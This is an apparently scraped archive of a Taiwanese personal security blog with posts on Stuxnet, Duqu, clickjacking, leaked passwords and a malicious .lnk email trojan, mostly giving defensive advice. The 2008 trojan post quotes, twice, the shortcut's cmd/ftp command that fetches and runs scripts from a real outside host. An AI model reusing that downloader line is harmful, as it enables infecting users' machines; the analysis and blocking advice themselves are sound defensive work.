...由於這類攻擊手法已於 2011-12-28 在德國的 Chaos Communication Congress 駭客年會中被公開,研究員 Julian Wälde 與 Alexander Klink 在現場展示如何透過一個自訂的表單攻擊目前市面上多個知名的 網站應用程式框架 (Web Application Frameworks),其中包括 PHP 4, PHP 5, Java / JSP, Apache Tomcat, Jetty, ASP.NET, Python, v8, … 等,他可以利用極少的 HTTP Requests 癱瘓現有的網站伺服器,而且不僅僅是 ASP.NET 可能受害,許多其他 Web 框架依然無法倖免於難!...
請大家盡快更新系統囉!
延伸閱讀:ASP.NET 發現重大資安弱點影響範圍涵蓋 ASP.NET 1.1 ~ 4.0
2012年1月2日 星期一
2011年11月6日 星期日
微軟發布惡意軟體 Duqu 處理方案
這次是透過 TrueType 字型引擎漏洞進行入侵,而且是各個 Windows 版本,且是 kernel mode 層級的漏洞,顯然會引起大風波啊~
微軟發布惡意軟體 Duqu 處理方案,但仍有更根本的問題要解決...
微軟發布惡意軟體 Duqu 處理方案,但仍有更根本的問題要解決...
2011年11月1日 星期二
駭客為了救出同伴,向墨西哥黑道宣戰
「知名駭客組織 - Anonymous,為了救出被墨西哥毒梟 Zetas 集團所綁架的夥伴,拍了一段影片向黑道宣戰,要求對方釋放人質,不然會11/5以激烈的手段來報復!」
讓我聯想到漫畫「血色星期一」第二部的劇情,精明的駭客可能不需槍砲彈藥,但發揮的威力更為強大。不過這個組織有沒有這個實力可以挑戰整個黑幫,而釋放回來的人質是不是還能活著,都是個問號啊~
槍砲與鍵鼠之戰的序幕 - 駭客為了救出同伴,向墨西哥黑道宣戰
讓我聯想到漫畫「血色星期一」第二部的劇情,精明的駭客可能不需槍砲彈藥,但發揮的威力更為強大。不過這個組織有沒有這個實力可以挑戰整個黑幫,而釋放回來的人質是不是還能活著,都是個問號啊~
槍砲與鍵鼠之戰的序幕 - 駭客為了救出同伴,向墨西哥黑道宣戰
2011年6月16日 星期四
iPhone用戶 最愛用的10組懶人密碼
新聞:iPhone用戶 最愛用的10組懶人密碼
以往手機用簡單的四位數字作為密碼,因為裡面也沒太多隱私資料,但隨著智慧型手機越來越普及,其實是該挑一個比較安全的密碼了!畢竟現在拿到手機,就等於拿到信箱、社交網站、照片各種資料的存取權限了~
以往手機用簡單的四位數字作為密碼,因為裡面也沒太多隱私資料,但隨著智慧型手機越來越普及,其實是該挑一個比較安全的密碼了!畢竟現在拿到手機,就等於拿到信箱、社交網站、照片各種資料的存取權限了~
2011年5月9日 星期一
神秘的病毒 - Stuxnet
這個神秘的病毒,會不會引爆全世界的核電廠,然後人類宣告滅亡呢?
朱學恆:「在伊朗境內開始流傳一種電腦病毒,這個病毒的編碼長達一萬五千行,由一大一小兩個零件所組成,幾乎可以說是資安人員所看過最複雜和先進的程式設計與安排。
問題來了,這個病毒雖然被稱做電腦病毒,卻不會對被感染的機器做出任何動作。資安專家測試了各種機型,各種設備,但他們手上有的機器卻都不對這個病毒的胃口。這個病毒只是一直靜靜的潛伏著,彷彿在等待它這輩子唯一期待的伴侶。 」
朱學恆:「在伊朗境內開始流傳一種電腦病毒,這個病毒的編碼長達一萬五千行,由一大一小兩個零件所組成,幾乎可以說是資安人員所看過最複雜和先進的程式設計與安排。
問題來了,這個病毒雖然被稱做電腦病毒,卻不會對被感染的機器做出任何動作。資安專家測試了各種機型,各種設備,但他們手上有的機器卻都不對這個病毒的胃口。這個病毒只是一直靜靜的潛伏著,彷彿在等待它這輩子唯一期待的伴侶。 」
2010年7月29日 星期四
2010年7月2日 星期五
Windows Help and Support Center 漏洞(轉貼)
轉貼 國家資通安全會報 技術服務中心漏洞/資安訊息警訊:
技術服務中心於近日發現,駭客利用Windows Help and Support Center尚未修補的弱點(CVE-2010-1885),Microsoft Security Advisory(2219475),透過惡意網頁連結或在文件中附加惡意網頁連結的方式進行攻擊。當使用者點擊這類惡意連結時,使用者電腦便可能遭植入惡意程式,攻擊者將可控制受害系統執行任意惡意行為。本中心已發現駭客經由電子郵件使用該弱點之WORD文件進行攻擊,由於目前微軟尚未修補此弱點,建議使用者參照以下建議措施來防堵這類的攻擊手法
[[MORE]]
建議措施
參考連結:XP零時差漏洞攻擊現身 Google工程師遭批
技術服務中心於近日發現,駭客利用Windows Help and Support Center尚未修補的弱點(CVE-2010-1885),Microsoft Security Advisory(2219475),透過惡意網頁連結或在文件中附加惡意網頁連結的方式進行攻擊。當使用者點擊這類惡意連結時,使用者電腦便可能遭植入惡意程式,攻擊者將可控制受害系統執行任意惡意行為。本中心已發現駭客經由電子郵件使用該弱點之WORD文件進行攻擊,由於目前微軟尚未修補此弱點,建議使用者參照以下建議措施來防堵這類的攻擊手法
[[MORE]]
建議措施
- 備份 HKEY_CLASSES_ROOT\HCP檔案後刪除,待微軟釋出修補程式後,重新匯入該檔案。
備分方式:點擊開始 > 執行,輸入Regedit進入登錄編輯程式,點擊HKEY_CLASSES_ROOT\HCP檔案 >右鍵選擇匯出 > 選擇匯出目錄,命名為HCP_Procotol_Backup.reg後,將 HKEY_CLASSES_ROOT\HCP 刪除匯入方式:點擊開始 > 執行,輸入Regedit進入登錄編輯程式,點擊「檔案」>「匯入」>擇擇「HCP_Procotol_Backup.reg」以重新匯入
備註:微軟說明及支援中心可能無法正常使用 - 使用自動修正程式
- 請勿開啟未受確認之電子郵件附件程式及附加之網頁連結
參考連結:XP零時差漏洞攻擊現身 Google工程師遭批
安全使用開放的無線網路
How to Stay Safe on Public Wi-Fi Networks
這是一篇 LifeHacker 的文章,簡單說明了出門在外使用開放的無線網路需要注意的安全事項。
主要是
[[MORE]]
在自動化設定網路方面,Windows 本身內建就有提供相關的配置,例如每次連到一個新的網路,作業系統都會詢問這是「住家、公司、還是開放場所」,針對不同的環境,系統會根據隱私權政策去進行適當的設定。但是畢竟這個相當陽春,如果時常拿著筆記型電腦到處移動,常常需要連上各種不同設定的網路的話,那麼 NetSetMan 是一個好物。
瀏覽器安全的方面,我們都知道盡可能使用 https 加密連線是比較安全的,很多網站也都有提供這協定,但卻不是預設使用,你可以透過 HTTPS Everywhere 這個 Firefox 擴充套件,在連上 Google Search、Wikipedia、Twitter、Facebook... 等網站的時候會自動使用 https 的加密協定。
而如果事業沒作那麼大的個人使用者,沒有公司 VPN 可用,也可以透過另一台可信任的電腦,安裝 Hamachi,這樣就有了自己的 VPN 了。
這是一篇 LifeHacker 的文章,簡單說明了出門在外使用開放的無線網路需要注意的安全事項。
主要是
- 關閉檔案分享
- 打開防火牆
- 到哪裡都使用 SSL 加密(以 gmail 設定為例)
- 使用VPN
- 如果用不到,請把無線網路訊號關閉
[[MORE]]
在自動化設定網路方面,Windows 本身內建就有提供相關的配置,例如每次連到一個新的網路,作業系統都會詢問這是「住家、公司、還是開放場所」,針對不同的環境,系統會根據隱私權政策去進行適當的設定。但是畢竟這個相當陽春,如果時常拿著筆記型電腦到處移動,常常需要連上各種不同設定的網路的話,那麼 NetSetMan 是一個好物。
瀏覽器安全的方面,我們都知道盡可能使用 https 加密連線是比較安全的,很多網站也都有提供這協定,但卻不是預設使用,你可以透過 HTTPS Everywhere 這個 Firefox 擴充套件,在連上 Google Search、Wikipedia、Twitter、Facebook... 等網站的時候會自動使用 https 的加密協定。
而如果事業沒作那麼大的個人使用者,沒有公司 VPN 可用,也可以透過另一台可信任的電腦,安裝 Hamachi,這樣就有了自己的 VPN 了。
2010年3月24日 星期三
用盜版的制裁!被勒索 + 公佈個人資料(台灣也一堆人中標)
Just read the post:
用盜版的制裁!被勒索 + 公佈個人資料(台灣也一堆人中標)
ICO's web site is offline now, but there are many many softwares with trojans/viruses waiting for you.
You can check software lists here: 會洩漏隱私的加料軟體與網站 後續
用盜版的制裁!被勒索 + 公佈個人資料(台灣也一堆人中標)
ICO's web site is offline now, but there are many many softwares with trojans/viruses waiting for you.
You can check software lists here: 會洩漏隱私的加料軟體與網站 後續
2010年1月18日 星期一
2009年10月8日 星期四
Statistics from 10,000 leaked Hotmail passwords
有駭客把超過 10000 以上的 Hotmail 帳號密碼貼到公開網站上,隨後有人針對這些帳號進行一些分析統計。
發現大多數是使用非常貧弱的密碼,例如 123456。相關分析請看原文:
Statistics from 10,000 leaked Hotmail passwords
發現大多數是使用非常貧弱的密碼,例如 123456。相關分析請看原文:
Statistics from 10,000 leaked Hotmail passwords
2009年3月13日 星期五
什麼手機容易被簡訊木馬竊聽?
在被監聽對象的手機上裝一個小軟體,就可以做到以下這些事,而被監聽者並不曉得:
1. 手機即時通話監聽 (可監聽手機雙方通話內容)
2. 手機現場環境監聽 (監聽手機周圍聲音)
3. 手機簡訊攔截 (簡訊複製記錄功能)
4. 手機即時通聯記錄 (已接.未接.撥出的往來電話記錄)
5. 手機開關機通知(簡訊即時告知開關機功能)
6. 手機遠端遙控功能開啟與關閉 (經由簡訊可設定監控手機功能設定)
7. 手機換卡通知 (經由簡訊即時通報手機換卡號碼)
在手機越來越智慧化的同時,它也越來越像小型的電腦,將來應該會有不少針對手機設計的後門或病毒程式吧!
全文請看:酷玩意部落格(sharecool.org)
1. 手機即時通話監聽 (可監聽手機雙方通話內容)
2. 手機現場環境監聽 (監聽手機周圍聲音)
3. 手機簡訊攔截 (簡訊複製記錄功能)
4. 手機即時通聯記錄 (已接.未接.撥出的往來電話記錄)
5. 手機開關機通知(簡訊即時告知開關機功能)
6. 手機遠端遙控功能開啟與關閉 (經由簡訊可設定監控手機功能設定)
7. 手機換卡通知 (經由簡訊即時通報手機換卡號碼)
在手機越來越智慧化的同時,它也越來越像小型的電腦,將來應該會有不少針對手機設計的後門或病毒程式吧!
全文請看:酷玩意部落格(sharecool.org)
2009年2月9日 星期一
lnk 附件木馬
對於此木馬的描述,請看前文「病毒:我設計的你看看」。
由於此類木馬,透過電子郵件傳播時,附件以「lnk」格式存在,亦即所謂的「捷徑」,各家防毒系統都不會加以阻攔。因為捷徑本身並不是病毒,捷徑本身所指的位置(或動作)才可能是病毒。
近來此類病毒由於可以穿透各防毒系統,似乎有越來越氾濫的趨勢。小弟在此提供幾個建議:
使用者端:
使用較聰明的客戶端郵件軟體,透過過濾規則將此類郵件濾除,避免誤點。
例如 Gmail 可以進入
Settings / Filters / Create a new Filter / Has the words: 「lnk」 / 勾選「Has Attachment」 / Delete it (英文介面)
設定 / 篩選器 / 建立新的篩選器 / 包含字詞: 「lnk」 / 勾選「有附件」/ 選擇動作「刪除此會話群組」
(中文介面)
管理者端:
直接針對 mail server 進行修改,阻擋 lnk 格式的附件。
例如修改 amavisd.conf,在過濾 exe、bat 的地方,再加上lnk。
然後防火牆直接過濾捷徑連上的伺服器,例如:lin31003100.3322.org
由於此類木馬,透過電子郵件傳播時,附件以「lnk」格式存在,亦即所謂的「捷徑」,各家防毒系統都不會加以阻攔。因為捷徑本身並不是病毒,捷徑本身所指的位置(或動作)才可能是病毒。
近來此類病毒由於可以穿透各防毒系統,似乎有越來越氾濫的趨勢。小弟在此提供幾個建議:
使用者端:
使用較聰明的客戶端郵件軟體,透過過濾規則將此類郵件濾除,避免誤點。
例如 Gmail 可以進入
Settings / Filters / Create a new Filter / Has the words: 「lnk」 / 勾選「Has Attachment」 / Delete it (英文介面)
設定 / 篩選器 / 建立新的篩選器 / 包含字詞: 「lnk」 / 勾選「有附件」/ 選擇動作「刪除此會話群組」
(中文介面)
管理者端:
直接針對 mail server 進行修改,阻擋 lnk 格式的附件。
例如修改 amavisd.conf,在過濾 exe、bat 的地方,再加上lnk。
然後防火牆直接過濾捷徑連上的伺服器,例如:lin31003100.3322.org
2009年1月13日 星期二
2008年12月12日 星期五
病毒:我設計的你看看
今天收到一個用 E-mail 寄來的病毒,標題如上。(那是信件標題,病毒不是我設計的!)
裡面附了一個檔案,是 .lnk 的捷徑檔,原本以為是打開後會連到惡意網站,結果仔細一看內容如下。
捷徑後面故意附了一長串空白,讓使用者用「內容」去看的時候,會看到空無一物。
可是我連上去,惡意程式無法下載,可能是伺服器負荷過大?
這種方式我倒是第一次看到,(可能是我孤陋寡聞),算是蠻有創意的一個病毒,是不是該稱讚一下?
"%windir%\system32\cmd.exe /c echo open lin31003100.3322.org > t.t&echo 123>>t.t&echo 123>>t.t&echo get down2.bat c:\down2.bat >> t.t&echo get vnet2.vbs %windir%\vnet2.vbs >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&start %windir%\vnet2.vbs& "
裡面附了一個檔案,是 .lnk 的捷徑檔,原本以為是打開後會連到惡意網站,結果仔細一看內容如下。
捷徑後面故意附了一長串空白,讓使用者用「內容」去看的時候,會看到空無一物。
可是我連上去,惡意程式無法下載,可能是伺服器負荷過大?
這種方式我倒是第一次看到,(可能是我孤陋寡聞),算是蠻有創意的一個病毒,是不是該稱讚一下?
"%windir%\system32\cmd.exe /c echo open lin31003100.3322.org > t.t&echo 123>>t.t&echo 123>>t.t&echo get down2.bat c:\down2.bat >> t.t&echo get vnet2.vbs %windir%\vnet2.vbs >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&start %windir%\vnet2.vbs& "
2008年10月26日 星期日
2008年10月11日 星期六
新的攻擊手法 Clickjacking
Clickjacking 是一個新的惡意攻擊手法,而且目前各廠牌瀏覽器都還沒有修補的方案。
參考以下資料:
[[MORE]]
簡單的說,大家都知道不明網站上的連結不要亂點,尤其出現問你「是否同意」、「確認、取消」的對話框時要特別注意。但這個漏洞則是利用 CSS 的排版技巧,用圖層去遮蓋連結。你可能只是在網頁上玩 Game,並在遊戲畫面上點來點去,結果你不知不覺點了「我同意」或是「確認」的按鈕。透過這個手法,駭客可以在你電腦中安裝軟體(因為你同意了嘛),也可以看到你的webcam視訊畫面(因為你也同意了啊),也可以傳回你的私人資料(對,你還是同意了)當然還有很多很多可能。
如果想節省時間的朋友,可以直接看這段影片瞭解該手法實際應用時的樣子:Youtube
膽子大一點的可以實際體驗一下遭受攻擊的感覺:Camera ClickJacking - The Game
我剛剛試了一下 Firefox + NoScript 擴充套件,預設是不會被攻擊的。再進一步解決方法出現之前,建議大家可以先安裝 NoScript 套件,雖然上網會不方便些,但是相對的安全許多。
還有不要上不明的網站,也要小心常上的網站突然改變排版或突然問你很多問題。
參考以下資料:
- iThome online :: 專家警告「點閱綁架」漏洞讓瀏覽器無一倖免
- 維基百科:Clickjacking
- Clickjacking Details
- 最新的跨瀏覽器攻擊手法:Clickjacking
[[MORE]]
簡單的說,大家都知道不明網站上的連結不要亂點,尤其出現問你「是否同意」、「確認、取消」的對話框時要特別注意。但這個漏洞則是利用 CSS 的排版技巧,用圖層去遮蓋連結。你可能只是在網頁上玩 Game,並在遊戲畫面上點來點去,結果你不知不覺點了「我同意」或是「確認」的按鈕。透過這個手法,駭客可以在你電腦中安裝軟體(因為你同意了嘛),也可以看到你的webcam視訊畫面(因為你也同意了啊),也可以傳回你的私人資料(對,你還是同意了)當然還有很多很多可能。
如果想節省時間的朋友,可以直接看這段影片瞭解該手法實際應用時的樣子:Youtube
膽子大一點的可以實際體驗一下遭受攻擊的感覺:Camera ClickJacking - The Game
我剛剛試了一下 Firefox + NoScript 擴充套件,預設是不會被攻擊的。再進一步解決方法出現之前,建議大家可以先安裝 NoScript 套件,雖然上網會不方便些,但是相對的安全許多。
還有不要上不明的網站,也要小心常上的網站突然改變排版或突然問你很多問題。
2008年10月9日 星期四
馬賽克的危險
有時候為了「有圖有真相」,有的人會把一些私人資料放到部落格,例如身份證、帳單等等,但又為了安全起見,放上去的圖片會用馬賽克把敏感的部分抹除。(例如消去身份證字號幾個號碼)
但小心了,馬賽克所抹除的文數字是有可能被還原回來的!
因為馬賽克雖然把文字內容變成圖塊,但不同的文字可能會變成不同顏色的圖塊,使用程式反覆比對,是可能還原出原始文數字的。那...有沒有解決的方法呢? 就是不要使用馬賽克,改用全黑、全白的單色方塊直接劃掉那些資訊,就像報紙上新聞照片處理被害者的眼睛那樣。
請看以下的原理與實作範例:
但小心了,馬賽克所抹除的文數字是有可能被還原回來的!
因為馬賽克雖然把文字內容變成圖塊,但不同的文字可能會變成不同顏色的圖塊,使用程式反覆比對,是可能還原出原始文數字的。那...有沒有解決的方法呢? 就是不要使用馬賽克,改用全黑、全白的單色方塊直接劃掉那些資訊,就像報紙上新聞照片處理被害者的眼睛那樣。
請看以下的原理與實作範例:
訂閱:
文章 (Atom)